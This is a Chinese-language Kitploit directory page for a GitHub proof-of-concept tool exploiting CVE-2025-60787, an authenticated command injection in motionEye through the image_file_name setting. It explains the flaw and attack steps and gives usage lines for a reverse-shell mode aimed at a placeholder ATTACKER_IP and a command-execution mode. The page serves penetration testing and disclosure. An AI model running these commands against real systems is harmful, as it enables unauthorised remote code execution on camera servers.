Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-60787-POC — 针对 CVE-2025-60787 的 Python PoC,在 motionEye <= 0.43.1b4 中,通过未清理的 image_file_name 配置实现已认证的操作系统命令注入远程代码执行(RCE) | Kitploit
工具/GitHubGitHub/d3vn0mi/cve-2025-60787-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHubd3vn0mi/cve-2025-60787-poc

CVE-2025-60787-POC

针对 CVE-2025-60787 的 Python PoC,在 motionEye <= 0.43.1b4 中,通过未清理的 image_file_name 配置实现已认证的操作系统命令注入远程代码执行(RCE)

查看仓库
26个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-60787 - motionEye 认证后的远程代码执行

通过未净化的 motion 配置参数在 motionEye <= 0.43.1b4 中实现认证后的远程代码执行

作者:d3vn0mi


漏洞概述

字段详情
CVE IDCVE-2025-60787
CVSS 评分7.2(高)
类型操作系统命令注入(CWE-78)
受影响版本motionEye <= 0.43.1b4
修复版本0.43.1b5

motionEye 接受配置字段(如 image_file_name)中的任意字符串,并将其直接写入 Motion 配置文件(/etc/motioneye/camera-*.conf)。当 Motion 服务重启时,它会将这些字段解析为支持 shell 扩展的字符串,从而允许认证攻击者注入并执行任意操作系统命令。

Web 界面为这些字段提供了客户端验证,但可以通过直接发送精心构造的 API 请求轻松绕过。

攻击流程

  1. 使用有效的管理员凭证认证到 motionEye
  2. 获取摄像头配置列表
  3. POST 一个包含恶意 image_file_name 值的修改后配置
  4. Motion 在拍摄快照时处理注入的命令(通过 capture_mode: interval-snapshots)

需求

  • Python 3.6+
  • requests 库
  • 有效的 motionEye 管理员凭证
  • 能够访问目标 motionEye 实例的网络

安装

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt

使用方法

该漏洞利用工具支持两种模式:反弹 Shell 和 命令执行。

反弹 Shell

在您的机器上启动一个监听器,然后运行:

root@kitploit:~
python3 exploit.py revshell \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -i ATTACKER_IP \
    --port 4444

命令执行

root@kitploit:~
python3 exploit.py command \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -e "id; whoami"

选项

标志描述
--url目标 motionEye URL(包含端口)
--usermotionEye 用户名
--passwordmotionEye 密码
-i / --host监听器 IP(反弹 Shell 模式)
--port监听器端口(反弹 Shell 模式)
-e / --exec要执行的命令(命令执行模式)
--camera-id指定目标摄像头 ID
--sh使用 /bin/sh 代替 /bin/bash
--no-verify跳过 TLS 证书验证
--proxy通过代理路由流量(例如 http://127.0.0.1:8080)

参考资料

  • GitHub 安全公告 - GHSA-j945-qm58-4gjx
  • Exploit-DB #52481
  • Rapid7 Metasploit 模块
  • motionEye 项目

致谢

  • d3vn0mi - 漏洞利用开发与工具构建
  • gunzf0x - 原始 CVE 发现与研究

免责声明

本工具仅用于授权的安全测试和教育目的。未经授权访问计算机系统是违法的。作者不对本软件的滥用承担任何责任。请在测试前始终获得适当授权。

许可证

本项目采用 MIT 许可证。

下载工具